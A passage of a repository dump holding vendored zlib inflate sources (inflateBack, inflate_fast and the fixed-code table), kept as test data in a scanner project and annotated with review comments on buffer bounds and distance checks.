        /* literal/length code lengths: symbols 0..143 get 8 bits, 144..255
           get 9, 256..279 get 7 and 280..287 get 8 */
        for (idx = 0; idx < 144; idx++)
            state->lens[idx] = 8;
        for (; idx < 256; idx++)
            state->lens[idx] = 9;
        for (; idx < 280; idx++)
            state->lens[idx] = 7;
        for (; idx < 288; idx++)
            state->lens[idx] = 8;
        cursor = fixed;
        lenfix = cursor;
        root = 9;
        inflate_table(LENS, state->lens, 288, &(cursor), &(root), state->work);

        /* distance code lengths: all 32 symbols get 5 bits; the table is
           placed right after the literal/length table in fixed[] */
        for (idx = 0; idx < 32; idx++)
            state->lens[idx] = 5;
        distfix = cursor;
        root = 5;
        inflate_table(DISTS, state->lens, 32, &(cursor), &(root), state->work);

        /* do this just once */
        virgin = 0;
    }
#else /* !BUILDFIXED */
#   include "inffixed.h"
#endif /* BUILDFIXED */
    state->lencode = lenfix;
    state->distcode = distfix;
    state->lenbits = 9;
    state->distbits = 5;
}

/* Macros for inflateBack(): */

/* Load returned state from inflate_fast() */
#define LOAD() \
    do { \
        put = strm->next_out; \
        left = strm->avail_out; \
        next = strm->next_in; \
        have = strm->avail_in; \
        hold = state->hold; \
        bits = state->bits; \
    } while (0)

/* Set state from registers for inflate_fast() */
#define RESTORE() \
    do { \
        strm->next_out = put; \
        strm->avail_out = left; \
        strm->next_in = next; \
        strm->avail_in = have; \
        state->hold = hold; \
        state->bits = bits; \
    } while (0)

/* Clear the input bit accumulator */
#define INITBITS() \
    do { \
        hold = 0; \
        bits = 0; \
    } while (0)

/* Assure that some input is available. If input is requested, but denied,
   then return a Z_BUF_ERROR from inflateBack(). */
#define PULL() \
    do { \
        if (have == 0) { \
            have = in(in_desc, &next); \
            if (have == 0) { \
                next = Z_NULL; \
                ret = Z_BUF_ERROR; \
                goto inf_leave; \
            } \
        } \
    } while (0)

/* Get a byte of input into the bit accumulator, or return from inflateBack()
   with an error if there is no input available.
*/
/* All of the macros below expand inside inflateBack() and operate directly on
   its locals (have, next, hold, bits, put, left, ret); PULL() and ROOM() leave
   the function through its inf_leave label when a call-back fails. */
#define PULLBYTE() \
    do { \
        PULL(); \
        have--; \
        hold += (unsigned long)(*next++) << bits; \
        bits += 8; \
    } while (0)

/* Assure that there are at least n bits in the bit accumulator. If there is
   not enough available input to do that, then return from inflateBack() with
   an error. */
#define NEEDBITS(n) \
    do { \
        while (bits < (unsigned)(n)) \
            PULLBYTE(); \
    } while (0)

/* Return the low n bits of the bit accumulator (n < 16) */
#define BITS(n) \
    ((unsigned)hold & ((1U << (n)) - 1))

/* Remove n bits from the bit accumulator */
#define DROPBITS(n) \
    do { \
        hold >>= (n); \
        bits -= (unsigned)(n); \
    } while (0)

/* Remove zero to seven bits as needed to go to a byte boundary */
#define BYTEBITS() \
    do { \
        hold >>= bits & 7; \
        bits -= bits & 7; \
    } while (0)

/* Assure that some output space is available, by writing out the window
   if it's full. If the write fails, return from inflateBack() with a
   Z_BUF_ERROR. Flushing rewinds put to the start of the window and marks the
   whole window as valid history (state->whave = state->wsize). */
#define ROOM() \
    do { \
        if (left == 0) { \
            put = state->window; \
            left = state->wsize; \
            state->whave = left; \
            if (out(out_desc, put, left)) { \
                ret = Z_BUF_ERROR; \
                goto inf_leave; \
            } \
        } \
    } while (0)

/*
   strm provides the memory allocation functions and window buffer on input,
   and provides information on the unused input on return. For Z_DATA_ERROR
   returns, strm will also provide an error message.

   in() and out() are the call-back input and output functions. When
   inflateBack() needs more input, it calls in(). When inflateBack() has
   filled the window with output, or when it completes with data in the
   window, it calls out() to write out the data. The application must not
   change the provided input until in() is called again or inflateBack()
   returns. The application must not change the window/output buffer until
   inflateBack() returns.

   in() and out() are called with a descriptor parameter provided in the
   inflateBack() call.
This parameter can be a structure that provides the
   information required to do the read or write, as well as accumulated
   information on the input and output such as totals and check values.

   in() should return zero on failure. out() should return non-zero on
   failure. If either in() or out() fails, then inflateBack() returns a
   Z_BUF_ERROR. strm->next_in can be checked for Z_NULL to see whether it
   was in() or out() that caused the error. Otherwise, inflateBack()
   returns Z_STREAM_END on success, Z_DATA_ERROR for a deflate format
   error, or Z_MEM_ERROR if it could not allocate memory for the state.
   inflateBack() can also return Z_STREAM_ERROR if the input parameters
   are not correct, i.e. strm is Z_NULL or the state was not initialized.
 */
int ZEXPORT inflateBack(z_streamp strm, in_func in, void FAR *in_desc,
                        out_func out, void FAR *out_desc) {
    struct inflate_state FAR *state;
    z_const unsigned char FAR *next;    /* next input */
    unsigned char FAR *put;     /* next output */
    unsigned have, left;        /* available input and output */
    unsigned long hold;         /* bit buffer */
    unsigned bits;              /* bits in bit buffer */
    unsigned copy;              /* number of stored or match bytes to copy */
    unsigned char FAR *from;    /* where to copy match bytes from */
    code here;                  /* current decoding table entry */
    code last;                  /* parent table entry */
    unsigned len;               /* length to copy for repeats, bits to drop */
    int ret;                    /* return code */
    static const unsigned short order[19] = /* permutation of code lengths */
        {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15};

    /* Check that the strm exists and that the state was initialized */
    if (strm == Z_NULL || strm->state == Z_NULL)
        return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;

    /* Reset the state */
    strm->msg = Z_NULL;
    state->mode = TYPE;
    state->last = 0;
    state->whave = 0;
    next = strm->next_in;
    /* avail_in is ignored when next_in is Z_NULL, so the first PULL() asks
       in() for data instead of dereferencing a null pointer */
    have = next != Z_NULL ? strm->avail_in : 0;
    hold = 0;
    bits = 0;
    put = state->window;
    left = state->wsize;

    /* Inflate until end of block marked as last */
    for (;;)
        switch (state->mode) {
        case TYPE:
            /* determine and dispatch block type */
            if (state->last) {
                BYTEBITS();
                state->mode = DONE;
                break;
            }
            NEEDBITS(3);
            state->last = BITS(1);
            DROPBITS(1);
            switch (BITS(2)) {
            case 0:                             /* stored block */
                Tracev((stderr, "inflate: stored block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = STORED;
                break;
            case 1:                             /* fixed block */
                fixedtables(state);
                Tracev((stderr, "inflate: fixed codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = LEN;              /* decode codes */
                break;
            case 2:                             /* dynamic block */
                Tracev((stderr, "inflate: dynamic codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = TABLE;
                break;
            case 3:
                strm->msg = (char *)"invalid block type";
                state->mode = BAD;
            }
            DROPBITS(2);
            break;

        case STORED:
            /* get and verify stored block length */
            BYTEBITS();                         /* go to byte boundary */
            NEEDBITS(32);
            /* the low 16 bits must be the one's complement of the high 16
               bits, otherwise the length field is rejected */
            if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) {
                strm->msg = (char *)"invalid stored block lengths";
                state->mode = BAD;
                break;
            }
            state->length = (unsigned)hold & 0xffff;
            Tracev((stderr, "inflate: stored length %u\n",
                    state->length));
            INITBITS();

            /* copy stored block from input to output */
            while (state->length != 0) {
                copy = state->length;
                PULL();
                ROOM();
                /* clamp to the input on hand and the space left in the
                   window, so zmemcpy() stays inside both buffers */
                if (copy > have) copy = have;
                if (copy > left) copy = left;
                zmemcpy(put, next, copy);
                have -= copy;
                next += copy;
                left -= copy;
                put += copy;
                state->length -= copy;
            }
            Tracev((stderr, "inflate: stored end\n"));
            state->mode = TYPE;
            break;

        case TABLE:
            /* get dynamic table entries descriptor */
            NEEDBITS(14);
            state->nlen = BITS(5) + 257;
            DROPBITS(5);
            state->ndist = BITS(5) + 1;
            DROPBITS(5);
            state->ncode = BITS(4) + 4;
            DROPBITS(4);
            /* symbol counts above 286 / 30 are rejected here; note that the
               check is compiled out when PKZIP_BUG_WORKAROUND is defined */
#ifndef PKZIP_BUG_WORKAROUND
            if (state->nlen > 286 || state->ndist > 30) {
                strm->msg = (char *)"too many length or distance symbols";
                state->mode = BAD;
                break;
            }
#endif
            Tracev((stderr, "inflate: table sizes ok\n"));

            /* get code length code lengths (not a typo) */
            state->have = 0;
            while (state->have < state->ncode) {
                NEEDBITS(3);
                state->lens[order[state->have++]] = (unsigned short)BITS(3);
                DROPBITS(3);
            }
            /* entries the stream did not supply are zeroed, so all 19 slots
               are defined before the table is built */
            while (state->have < 19)
                state->lens[order[state->have++]] = 0;
            state->next = state->codes;
            state->lencode = (code const FAR *)(state->next);
            state->lenbits = 7;
            ret = inflate_table(CODES, state->lens, 19, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid code lengths set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate: code lengths ok\n"));

            /* get length and distance code code lengths */
            state->have = 0;
            while (state->have < state->nlen + state->ndist) {
                for (;;) {
                    here = state->lencode[BITS(state->lenbits)];
                    if ((unsigned)(here.bits) <= bits) break;
                    PULLBYTE();
                }
                if (here.val < 16) {
                    DROPBITS(here.bits);
                    state->lens[state->have++] = here.val;
                }
                else {
                    if (here.val == 16) {
                        NEEDBITS(here.bits + 2);
                        DROPBITS(here.bits);
                        /* "repeat previous length" with no previous entry
                           would read state->lens[-1]; reject it */
                        if (state->have == 0) {
                            strm->msg = (char *)"invalid bit length repeat";
                            state->mode = BAD;
                            break;
                        }
                        len = (unsigned)(state->lens[state->have - 1]);
                        copy = 3 + BITS(2);
                        DROPBITS(2);
                    }
                    else if (here.val == 17) {
                        NEEDBITS(here.bits + 3);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 3 + BITS(3);
                        DROPBITS(3);
                    }
                    else {
                        NEEDBITS(here.bits + 7);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 11 + BITS(7);
                        DROPBITS(7);
                    }
                    /* a repeat run may not extend past the declared number
                       of code lengths; this bounds the writes to
                       state->lens in the loop that follows */
                    if (state->have + copy > state->nlen + state->ndist) {
                        strm->msg = (char *)"invalid bit length repeat";
                        state->mode = BAD;
                        break;
                    }
                    while (copy--)
                        state->lens[state->have++] = (unsigned short)len;
                }
            }

            /* handle error breaks in while */
            if (state->mode == BAD) break;

            /* check for end-of-block code (better have one) */
            if (state->lens[256] == 0) {
                strm->msg = (char *)"invalid code -- missing end-of-block";
                state->mode = BAD;
                break;
            }

            /* build code tables -- note: do not change the lenbits or distbits
               values here (9 and 6) without reading the comments in inftrees.h
               concerning the ENOUGH constants, which depend on those values */
            state->next = state->codes;
            state->lencode = (code const FAR *)(state->next);
            state->lenbits = 9;
            ret = inflate_table(LENS, state->lens, state->nlen, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid literal/lengths set";
                state->mode = BAD;
                break;
            }
            state->distcode = (code const FAR *)(state->next);
            state->distbits = 6;
            ret = inflate_table(DISTS, state->lens + state->nlen,
                                state->ndist, &(state->next),
                                &(state->distbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid distances set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate: codes ok\n"));
            state->mode = LEN;
                /* fallthrough */

        case LEN:
            /* use inflate_fast() if we have enough input and output */
            if (have >= 6 && left >= 258) {
                RESTORE();
                if (state->whave < state->wsize)
                    state->whave = state->wsize - left;
                inflate_fast(strm, state->wsize);
                LOAD();
                break;
            }

            /* get a literal, length, or end-of-block code */
            for (;;) {
                here = state->lencode[BITS(state->lenbits)];
                if ((unsigned)(here.bits) <= bits) break;
                PULLBYTE();
            }
            /* a non-zero op with the high nibble clear is a link to a
               second-level table */
            if (here.op && (here.op & 0xf0) == 0) {
                last = here;
                for (;;) {
                    here = state->lencode[last.val +
                            (BITS(last.bits + last.op) >> last.bits)];
                    if ((unsigned)(last.bits + here.bits) <= bits) break;
                    PULLBYTE();
                }
                DROPBITS(last.bits);
            }
            DROPBITS(here.bits);
            state->length = (unsigned)here.val;

            /* process literal */
            if (here.op == 0) {
                Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ?
                        "inflate: literal '%c'\n" :
                        "inflate: literal 0x%02x\n", here.val));
                ROOM();
                *put++ = (unsigned char)(state->length);
                left--;
                state->mode = LEN;
                break;
            }

            /* process end of block */
            if (here.op & 32) {
                Tracevv((stderr, "inflate: end of block\n"));
                state->mode = TYPE;
                break;
            }

            /* invalid code */
            if (here.op & 64) {
                strm->msg = (char *)"invalid literal/length code";
                state->mode = BAD;
                break;
            }

            /* length code -- get extra bits, if any */
            state->extra = (unsigned)(here.op) & 15;
            if (state->extra != 0) {
                NEEDBITS(state->extra);
                state->length += BITS(state->extra);
                DROPBITS(state->extra);
            }
            Tracevv((stderr, "inflate: length %u\n", state->length));

            /* get distance code */
            for (;;) {
                here = state->distcode[BITS(state->distbits)];
                if ((unsigned)(here.bits) <= bits) break;
                PULLBYTE();
            }
            if ((here.op & 0xf0) == 0) {
                last = here;
                for (;;) {
                    here = state->distcode[last.val +
                            (BITS(last.bits + last.op) >> last.bits)];
                    if ((unsigned)(last.bits + here.bits) <= bits) break;
                    PULLBYTE();
                }
                DROPBITS(last.bits);
            }
            DROPBITS(here.bits);
            if (here.op & 64) {
                strm->msg = (char *)"invalid distance code";
                state->mode = BAD;
                break;
            }
            state->offset = (unsigned)here.val;

            /* get distance extra bits, if any */
            state->extra = (unsigned)(here.op) & 15;
            if (state->extra != 0) {
                NEEDBITS(state->extra);
                state->offset += BITS(state->extra);
                DROPBITS(state->extra);
            }
            /* the match may reach back at most over the bytes produced so
               far: wsize - left until the window has been filled once
               (whave < wsize), the whole window afterwards; this check is
               what keeps the copy below inside the window */
            if (state->offset > state->wsize - (state->whave < state->wsize ?
                                                left : 0)) {
                strm->msg = (char *)"invalid distance too far back";
                state->mode = BAD;
                break;
            }
            Tracevv((stderr, "inflate: distance %u\n", state->offset));

            /* copy match from window to output */
            do {
                ROOM();
                /* the window is used as a circular buffer: the source is
                   either ahead of put (wrapped) or offset bytes behind it,
                   and each pass copies at most up to the end of the window */
                copy = state->wsize - state->offset;
                if (copy < left) {
                    from = put + copy;
                    copy = left - copy;
                }
                else {
                    from = put - state->offset;
                    copy = left;
                }
                if (copy > state->length) copy = state->length;
                state->length -= copy;
                left -= copy;
                do {
                    *put++ = *from++;
                } while (--copy);
            } while (state->length != 0);
            break;

        case DONE:
            /* inflate stream terminated properly */
            ret = Z_STREAM_END;
            goto inf_leave;

        case BAD:
            ret = Z_DATA_ERROR;
            goto inf_leave;

        default:
            /* can't happen, but makes compilers happy */
            ret = Z_STREAM_ERROR;
            goto inf_leave;
        }

    /* Write leftover output and return unused input */
    /* a failing out() here only replaces the return code when the stream had
       otherwise ended cleanly; an earlier error code is kept */
  inf_leave:
    if (left < state->wsize) {
        if (out(out_desc, state->window, state->wsize - left) &&
            ret == Z_STREAM_END)
            ret = Z_BUF_ERROR;
    }
    strm->next_in = next;
    strm->avail_in = have;
    return ret;
}

/* Release the inflate state through ZFREE and clear strm->state so that a
   later call on the same stream is rejected. Returns Z_STREAM_ERROR when
   strm, its state or its zfree hook is missing, Z_OK otherwise. */
int ZEXPORT inflateBackEnd(z_streamp strm) {
    if (strm == Z_NULL || strm->state == Z_NULL || strm->zfree == (free_func)0)
        return Z_STREAM_ERROR;
    ZFREE(strm, strm->state);
    strm->state = Z_NULL;
    Tracev((stderr, "inflate: end\n"));
    return Z_OK;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffast.c
================================================
/* inffast.c -- fast decoding
 * Copyright (C) 1995-2017 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

#include "zutil.h"
#include "inftrees.h"
#include "inflate.h"
#include "inffast.h"

#ifdef ASMINF
#  pragma message("Assembler code may have bugs -- use at your own risk")
#else

/*
   Decode literal, length, and distance codes and write out the resulting
   literal and match bytes until either not enough input or output is
   available, an end-of-block is encountered, or a data error is encountered.
When large enough input and output buffers are supplied to inflate(), for example, a 16K input buffer and a 64K output buffer, more than 95% of the inflate execution time is spent in this routine. Entry assumptions: state->mode == LEN strm->avail_in >= 6 strm->avail_out >= 258 start >= strm->avail_out state->bits < 8 On return, state->mode is one of: LEN -- ran out of enough output space or enough available input TYPE -- reached end of block code, inflate() to interpret next block BAD -- error in block data Notes: - The maximum input bits used by a length/distance pair is 15 bits for the length code, 5 bits for the length extra, 15 bits for the distance code, and 13 bits for the distance extra. This totals 48 bits, or six bytes. Therefore if strm->avail_in >= 6, then there is enough input to avoid checking for available input while decoding. - The maximum bytes that a single length/distance pair can output is 258 bytes, which is the maximum length that can be coded. inflate_fast() requires strm->avail_out >= 258 for each loop to avoid checking for output space. 
*/
/* Review note on the bounds model of inflate_fast():
   - Input is read through `in` and output is written through `out` with no
     check on each access.  The only limits are the loop condition
     `in < last && out < end`, where last = next_in + (avail_in - 5) and
     end = next_out + (avail_out - 257).
   - The entry assumptions listed above are not re-validated in this function;
     the caller has to guarantee them before every call.
   - A match distance that reaches further back than the bytes already written
     (out - beg) plus the valid window bytes (whave) is rejected only when
     state->sane is non-zero; see the notes at that check below. */
void ZLIB_INTERNAL inflate_fast(z_streamp strm, unsigned start) {
    struct inflate_state FAR *state;
    z_const unsigned char FAR *in;      /* local strm->next_in */
    z_const unsigned char FAR *last;    /* have enough input while in < last */
    unsigned char FAR *out;     /* local strm->next_out */
    unsigned char FAR *beg;     /* inflate()'s initial strm->next_out */
    unsigned char FAR *end;     /* while out < end, enough space available */
#ifdef INFLATE_STRICT
    unsigned dmax;              /* maximum distance from zlib header */
#endif
    unsigned wsize;             /* window size or zero if not using window */
    unsigned whave;             /* valid bytes in the window */
    unsigned wnext;             /* window write index */
    unsigned char FAR *window;  /* allocated sliding window, if wsize != 0 */
    unsigned long hold;         /* local strm->hold */
    unsigned bits;              /* local strm->bits */
    code const FAR *lcode;      /* local strm->lencode */
    code const FAR *dcode;      /* local strm->distcode */
    unsigned lmask;             /* mask for first level of length codes */
    unsigned dmask;             /* mask for first level of distance codes */
    code const *here;           /* retrieved table entry */
    unsigned op;                /* code bits, operation, extra bits, or */
                                /*  window position, window bytes to copy */
    unsigned len;               /* match length, unused bytes */
    unsigned dist;              /* match distance */
    unsigned char FAR *from;    /* where to copy match from */

    /* copy state to local variables */
    state = (struct inflate_state FAR *)strm->state;
    in = strm->next_in;
    /* last and end stop 5 input bytes and 257 output bytes short of the
       buffers, which leaves room for one more full iteration (6 bytes in,
       258 bytes out, per the notes above) once the loop test has passed */
    last = in + (strm->avail_in - 5);
    out = strm->next_out;
    /* start is avail_out as it was when inflate() began, so beg is the first
       byte inflate() wrote during this call */
    beg = out - (start - strm->avail_out);
    end = out + (strm->avail_out - 257);
#ifdef INFLATE_STRICT
    dmax = state->dmax;
#endif
    wsize = state->wsize;
    whave = state->whave;
    wnext = state->wnext;
    window = state->window;
    hold = state->hold;
    bits = state->bits;
    lcode = state->lencode;
    dcode = state->distcode;
    lmask = (1U << state->lenbits) - 1;
    dmask = (1U << state->distbits) - 1;

    /* decode literals and length/distances until end-of-block or not enough
       input data or output space */
    do {
        if (bits < 15) {
            /* unchecked reads: covered by the in < last loop condition */
            hold += (unsigned long)(*in++) << bits;
            bits += 8;
            hold += (unsigned long)(*in++) << bits;
            bits += 8;
        }
        here = lcode + (hold & lmask);
      dolen:
        op = (unsigned)(here->bits);
        hold >>= op;
        bits -= op;
        op = (unsigned)(here->op);
        if (op == 0) {                          /* literal */
            Tracevv((stderr, here->val >= 0x20 && here->val < 0x7f ?
                    "inflate: literal '%c'\n" :
                    "inflate: literal 0x%02x\n", here->val));
            *out++ = (unsigned char)(here->val);
        }
        else if (op & 16) {                     /* length base */
            len = (unsigned)(here->val);
            op &= 15;                           /* number of extra bits */
            if (op) {
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                }
                len += (unsigned)hold & ((1U << op) - 1);
                hold >>= op;
                bits -= op;
            }
            Tracevv((stderr, "inflate: length %u\n", len));
            if (bits < 15) {
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
            }
            here = dcode + (hold & dmask);
          dodist:
            op = (unsigned)(here->bits);
            hold >>= op;
            bits -= op;
            op = (unsigned)(here->op);
            if (op & 16) {                      /* distance base */
                dist = (unsigned)(here->val);
                op &= 15;                       /* number of extra bits */
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                    if (bits < op) {
                        hold += (unsigned long)(*in++) << bits;
                        bits += 8;
                    }
                }
                dist += (unsigned)hold & ((1U << op) - 1);
#ifdef INFLATE_STRICT
                /* optional stricter check, compiled in only with
                   INFLATE_STRICT: reject distances above state->dmax */
                if (dist > dmax) {
                    strm->msg = (char *)"invalid distance too far back";
                    state->mode = BAD;
                    break;
                }
#endif
                hold >>= op;
                bits -= op;
                Tracevv((stderr, "inflate: distance %u\n", dist));
                op = (unsigned)(out - beg);     /* max distance in output */
                if (dist > op) {                /* see if copy from window */
                    op = dist - op;             /* distance back in window */
                    if (op > whave) {
                        /* the match refers to data before the valid window
                           contents; with state->sane set the stream is
                           rejected here */
                        if (state->sane) {
                            strm->msg =
                                (char *)"invalid distance too far back";
                            state->mode = BAD;
                            break;
                        }
                        /* NOTE(review): with sane == 0 and the macro below
                           undefined, execution continues into the window copy
                           with op > whave.  Confirm that builds which process
                           untrusted data never clear state->sane. */
#ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR
                        /* compile-time option: the part of the match that
                           lies before the valid window is emitted as zero
                           bytes instead of being rejected */
                        if (len <= op - whave) {
                            do {
                                *out++ = 0;
                            } while (--len);
                            continue;
                        }
                        len -= op - whave;
                        do {
                            *out++ = 0;
                        } while (--op > whave);
                        if (op == 0) {
                            from = out - dist;
                            do {
                                *out++ = *from++;
                            } while (--len);
                            continue;
                        }
#endif
                    }
                    from = window;
                    if (wnext == 0) {           /* very common case */
                        from += wsize - op;
                        if (op < len) {         /* some from window */
                            len -= op;
                            do {
                                *out++ = *from++;
                            } while (--op);
                            from = out - dist;  /* rest from output */
                        }
                    }
                    else if (wnext < op) {      /* wrap around window */
                        from += wsize + wnext - op;
                        op -= wnext;
                        if (op < len) {         /* some from end of window */
                            len -= op;
                            do {
                                *out++ = *from++;
                            } while (--op);
                            from = window;
                            if (wnext < len) {  /* some from start of window */
                                op = wnext;
                                len -= op;
                                do {
                                    *out++ = *from++;
                                } while (--op);
                                from = out - dist;      /* rest from output */
                            }
                        }
                    }
                    else {                      /* contiguous in window */
                        from += wnext - op;
                        if (op < len) {         /* some from window */
                            len -= op;
                            do {
                                *out++ = *from++;
                            } while (--op);
                            from = out - dist;  /* rest from output */
                        }
                    }
                    while (len > 2) {
                        *out++ = *from++;
                        *out++ = *from++;
                        *out++ = *from++;
                        len -= 3;
                    }
                    if (len) {
                        *out++ = *from++;
                        if (len > 1)
                            *out++ = *from++;
                    }
                }
                else {
                    /* dist <= out - beg here, so from stays at or after beg.
                       The copy is done one byte at a time, so source and
                       destination may overlap when dist < len. */
                    from = out - dist;          /* copy direct from output */
                    do {                        /* minimum length is three */
                        *out++ = *from++;
                        *out++ = *from++;
                        *out++ = *from++;
                        len -= 3;
                    } while (len > 2);
                    if (len) {
                        *out++ = *from++;
                        if (len > 1)
                            *out++ = *from++;
                    }
                }
            }
            else if ((op & 64) == 0) {          /* 2nd level distance code */
                here = dcode + here->val + (hold & ((1U << op) - 1));
                goto dodist;
            }
            else {
                strm->msg = (char *)"invalid distance code";
                state->mode = BAD;
                break;
            }
        }
        else if ((op & 64) == 0) {              /* 2nd level length code */
            here = lcode + here->val + (hold & ((1U << op) - 1));
            goto dolen;
        }
        else if (op & 32) {                     /* end-of-block */
            Tracevv((stderr, "inflate: end of block\n"));
            state->mode = TYPE;
            break;
        }
        else {
            strm->msg = (char *)"invalid literal/length code";
            state->mode = BAD;
            break;
        }
    } while (in < last && out < end);

    /* return unused bytes (on entry, bits < 8, so in won't go too far back) */
    len = bits >> 3;
    in -= len;
    bits -= len << 3;
    hold &= (1U << bits) - 1;

    /* update state and return */
    strm->next_in = in;
    strm->next_out = out;
    /* rebuild the counts from the pointers; the second arm of each ternary
       handles a pointer that has moved past last or end within the slack */
    strm->avail_in = (unsigned)(in < last ? 5 + (last - in) : 5 - (in - last));
    strm->avail_out = (unsigned)(out < end ?
                                 257 + (end - out) : 257 - (out - end));
    state->hold = hold;
    state->bits = bits;
    return;
}

/*
   inflate_fast() speedups that turned out slower (on a PowerPC G3 750CXe):
   - Using bit fields for code structure
   - Different op definition to avoid & for extra bits (do & for table bits)
   - Three separate decoding do-loops for direct, window, and wnext == 0
   - Special case for distance > 1 copies to do overlapped load and store copy
   - Explicit branch predictions (based on measured branch probabilities)
   - Deferring match copy and interspersed it with decoding subsequent codes
   - Swapping literal/length else
   - Swapping window/direct else
   - Larger unrolled copy loops (three is about right)
   - Moving len -= 3 statement into middle of loop
 */

#endif /* !ASMINF */

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffast.h
================================================
/* inffast.h -- header to use inffast.c
 * Copyright (C) 1995-2003, 2010 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/* WARNING: this file should *not* be used by applications. It is
   part of the implementation of the compression library and is
   subject to change. Applications should only use zlib.h.
 */

void ZLIB_INTERNAL inflate_fast(z_streamp strm, unsigned start);

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffixed.h
================================================
/* inffixed.h -- table for decoding fixed codes
 * Generated automatically by makefixed().
 */

/* WARNING: this file should *not* be used by applications.
   It is part of the implementation of this library and is
   subject to change. Applications should only use zlib.h.
*/ static const code lenfix[512] = { {96,7,0},{0,8,80},{0,8,16},{20,8,115},{18,7,31},{0,8,112},{0,8,48}, {0,9,192},{16,7,10},{0,8,96},{0,8,32},{0,9,160},{0,8,0},{0,8,128}, {0,8,64},{0,9,224},{16,7,6},{0,8,88},{0,8,24},{0,9,144},{19,7,59}, {0,8,120},{0,8,56},{0,9,208},{17,7,17},{0,8,104},{0,8,40},{0,9,176}, {0,8,8},{0,8,136},{0,8,72},{0,9,240},{16,7,4},{0,8,84},{0,8,20}, {21,8,227},{19,7,43},{0,8,116},{0,8,52},{0,9,200},{17,7,13},{0,8,100}, {0,8,36},{0,9,168},{0,8,4},{0,8,132},{0,8,68},{0,9,232},{16,7,8}, {0,8,92},{0,8,28},{0,9,152},{20,7,83},{0,8,124},{0,8,60},{0,9,216}, {18,7,23},{0,8,108},{0,8,44},{0,9,184},{0,8,12},{0,8,140},{0,8,76}, {0,9,248},{16,7,3},{0,8,82},{0,8,18},{21,8,163},{19,7,35},{0,8,114}, {0,8,50},{0,9,196},{17,7,11},{0,8,98},{0,8,34},{0,9,164},{0,8,2}, {0,8,130},{0,8,66},{0,9,228},{16,7,7},{0,8,90},{0,8,26},{0,9,148}, {20,7,67},{0,8,122},{0,8,58},{0,9,212},{18,7,19},{0,8,106},{0,8,42}, {0,9,180},{0,8,10},{0,8,138},{0,8,74},{0,9,244},{16,7,5},{0,8,86}, {0,8,22},{64,8,0},{19,7,51},{0,8,118},{0,8,54},{0,9,204},{17,7,15}, {0,8,102},{0,8,38},{0,9,172},{0,8,6},{0,8,134},{0,8,70},{0,9,236}, {16,7,9},{0,8,94},{0,8,30},{0,9,156},{20,7,99},{0,8,126},{0,8,62}, {0,9,220},{18,7,27},{0,8,110},{0,8,46},{0,9,188},{0,8,14},{0,8,142}, {0,8,78},{0,9,252},{96,7,0},{0,8,81},{0,8,17},{21,8,131},{18,7,31}, {0,8,113},{0,8,49},{0,9,194},{16,7,10},{0,8,97},{0,8,33},{0,9,162}, {0,8,1},{0,8,129},{0,8,65},{0,9,226},{16,7,6},{0,8,89},{0,8,25}, {0,9,146},{19,7,59},{0,8,121},{0,8,57},{0,9,210},{17,7,17},{0,8,105}, {0,8,41},{0,9,178},{0,8,9},{0,8,137},{0,8,73},{0,9,242},{16,7,4}, {0,8,85},{0,8,21},{16,8,258},{19,7,43},{0,8,117},{0,8,53},{0,9,202}, {17,7,13},{0,8,101},{0,8,37},{0,9,170},{0,8,5},{0,8,133},{0,8,69}, {0,9,234},{16,7,8},{0,8,93},{0,8,29},{0,9,154},{20,7,83},{0,8,125}, {0,8,61},{0,9,218},{18,7,23},{0,8,109},{0,8,45},{0,9,186},{0,8,13}, {0,8,141},{0,8,77},{0,9,250},{16,7,3},{0,8,83},{0,8,19},{21,8,195}, {19,7,35},{0,8,115},{0,8,51},{0,9,198},{17,7,11},{0,8,99},{0,8,35}, 
